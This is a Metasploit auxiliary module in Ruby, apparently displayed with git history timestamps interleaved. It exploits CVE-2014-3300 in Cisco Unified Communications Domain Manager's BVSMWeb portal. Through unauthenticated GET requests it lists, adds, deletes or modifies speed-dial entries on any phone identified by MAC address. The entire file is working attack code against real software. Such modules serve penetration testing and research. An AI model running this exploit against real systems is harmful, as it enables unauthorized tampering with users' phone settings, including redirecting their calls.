metasploit-framework/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb

204 lines
5.8 KiB
Ruby
Raw Normal View History

##
2017-07-24 13:26:21 +00:00
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rexml/document'
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
2015-01-10 06:32:10 +00:00
def initialize(info={})
super(update_info(info,
'Name' => 'Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool',
'Description' => %q{
2015-01-10 07:10:08 +00:00
The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager
(CDM), before version 10, doesn't implement access control properly, which allows remote
attackers to modify user information. This module exploits the vulnerability to make
2017-08-29 00:17:58 +00:00
unauthorized speed dial entity manipulations.
},
2015-01-10 06:32:10 +00:00
'Author' => 'fozavci',
'References' =>
[
['CVE', '2014-3300'],
['BID', '68331']
],
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'List', { 'Description' => 'Getting the speeddials for the MAC address' } ],
[ 'Modify', { 'Description' => 'Modifying a speeddial for the MAC address' } ],
[ 'Add', { 'Description' => 'Adding a speeddial for the MAC address' } ],
[ 'Delete', { 'Description' => 'Deleting a speeddial for the MAC address' } ]
],
'DefaultAction' => 'List'
2015-01-10 06:32:10 +00:00
))
register_options(
[
OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
OptString.new('NAME', [ false, 'Name for Speed Dial', 'viproy']),
OptString.new('POSITION', [ false, 'Position for Speed Dial', '1']),
OptString.new('TELNO', [ false, 'Phone number for Speed Dial', '007']),
])
end
def run
case action.name.upcase
when 'MODIFY'
2015-01-10 07:06:56 +00:00
modify
when 'DELETE'
2015-01-10 07:06:56 +00:00
delete
when 'ADD'
2015-01-10 07:06:56 +00:00
add
when 'LIST'
list
end
end
2015-01-10 06:51:31 +00:00
def send_rcv(uri, vars_get)
uri = normalize_uri(target_uri.to_s, uri.to_s)
res = send_request_cgi(
2015-01-10 06:32:10 +00:00
{
'uri' => uri,
'method' => 'GET',
2015-01-10 06:51:31 +00:00
'vars_get' => vars_get
2015-01-10 06:32:10 +00:00
})
2015-01-10 06:51:31 +00:00
if res && res.code == 200 && res.body && res.body.to_s =~ /Speed [D|d]ial/
return Exploit::CheckCode::Vulnerable, res
else
2016-02-01 22:06:34 +00:00
print_error("Target appears not vulnerable!")
2015-01-10 06:51:31 +00:00
return Exploit::CheckCode::Safe, res
end
end
def parse(res)
doc = REXML::Document.new(res.body)
2015-01-10 06:51:31 +00:00
names = []
phones = []
2015-01-10 06:51:31 +00:00
list = doc.root.get_elements('DirectoryEntry')
list.each do |lst|
xlist = lst.get_elements('Name')
xlist.each {|l| names << "#{l[0]}"}
2015-01-10 06:51:31 +00:00
xlist = lst.get_elements('Telephone')
xlist.each {|l| phones << "#{l[0]}" }
2015-01-10 06:51:31 +00:00
end
if names.size > 0
2015-01-10 06:51:31 +00:00
names.size.times do |i|
info = ''
info << "Position: #{names[i].split(":")[0]}, "
info << "Name: #{names[i].split(":")[1]}, "
info << "Telephone: #{phones[i]}"
2016-02-01 22:06:34 +00:00
print_good("#{info}")
2015-01-10 06:51:31 +00:00
end
else
2016-02-01 22:06:34 +00:00
print_status("No Speed Dial detected")
end
end
2015-01-10 07:06:56 +00:00
def list
mac = datastore['MAC']
2016-02-01 22:06:34 +00:00
print_status("Getting Speed Dials of the IP phone")
2015-01-10 07:06:56 +00:00
vars_get = {
'device' => "SEP#{mac}"
}
status, res = send_rcv('speeddials.cgi', vars_get)
parse(res) unless status == Exploit::CheckCode::Safe
end
def add
mac = datastore['MAC']
name = datastore['NAME']
position = datastore['POSITION']
telno = datastore['TELNO']
2016-02-01 22:06:34 +00:00
print_status("Adding Speed Dial to the IP phone")
2015-01-10 07:06:56 +00:00
vars_get = {
'name' => "#{name}",
'telno' => "#{telno}",
'device' => "SEP#{mac}",
'entry' => "#{position}",
'mac' => "#{mac}"
}
status, res = send_rcv('phonespeedialadd.cgi', vars_get)
if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/
2016-02-01 22:06:34 +00:00
print_good("Speed Dial #{position} is added successfully")
2015-01-10 07:06:56 +00:00
elsif res && res.body && res.body.to_s =~ /exist/
2016-02-01 22:06:34 +00:00
print_error("Speed Dial is exist, change the position or choose modify!")
2015-01-10 07:06:56 +00:00
else
2016-02-01 22:06:34 +00:00
print_error("Speed Dial couldn't add!")
2015-01-10 07:06:56 +00:00
end
end
def delete
mac = datastore['MAC']
position = datastore['POSITION']
2016-02-01 22:06:34 +00:00
print_status("Deleting Speed Dial of the IP phone")
2015-01-10 07:06:56 +00:00
vars_get = {
'entry' => "#{position}",
'device' => "SEP#{mac}"
}
status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)
if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/
2016-02-01 22:06:34 +00:00
print_good("Speed Dial #{position} is deleted successfully")
2015-01-10 07:06:56 +00:00
else
2016-02-01 22:06:34 +00:00
print_error("Speed Dial is not found!")
2015-01-10 07:06:56 +00:00
end
end
def modify
mac = datastore['MAC']
name = datastore['NAME']
position = datastore['POSITION']
telno = datastore['TELNO']
2016-02-01 22:06:34 +00:00
print_status("Deleting Speed Dial of the IP phone")
2015-01-10 07:06:56 +00:00
vars_get = {
'entry' => "#{position}",
'device' => "SEP#{mac}"
}
status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)
if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/
2016-02-01 22:06:34 +00:00
print_good("Speed Dial #{position} is deleted successfully")
print_status("Adding Speed Dial to the IP phone")
2015-01-10 07:06:56 +00:00
vars_get = {
'name' => "#{name}",
'telno' => "#{telno}",
'device' => "SEP#{mac}",
'entry' => "#{position}",
'mac' => "#{mac}"
}
status, res = send_rcv('phonespeedialadd.cgi', vars_get)
if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/
2016-02-01 22:06:34 +00:00
print_good("Speed Dial #{position} is added successfully")
2015-01-10 07:06:56 +00:00
elsif res && res.body =~ /exist/
2016-02-01 22:06:34 +00:00
print_error("Speed Dial is exist, change the position or choose modify!")
2015-01-10 07:06:56 +00:00
else
2016-02-01 22:06:34 +00:00
print_error("Speed Dial couldn't add!")
2015-01-10 07:06:56 +00:00
end
else
2016-02-01 22:06:34 +00:00
print_error("Speed Dial is not found!")
2015-01-10 07:06:56 +00:00
end
end
end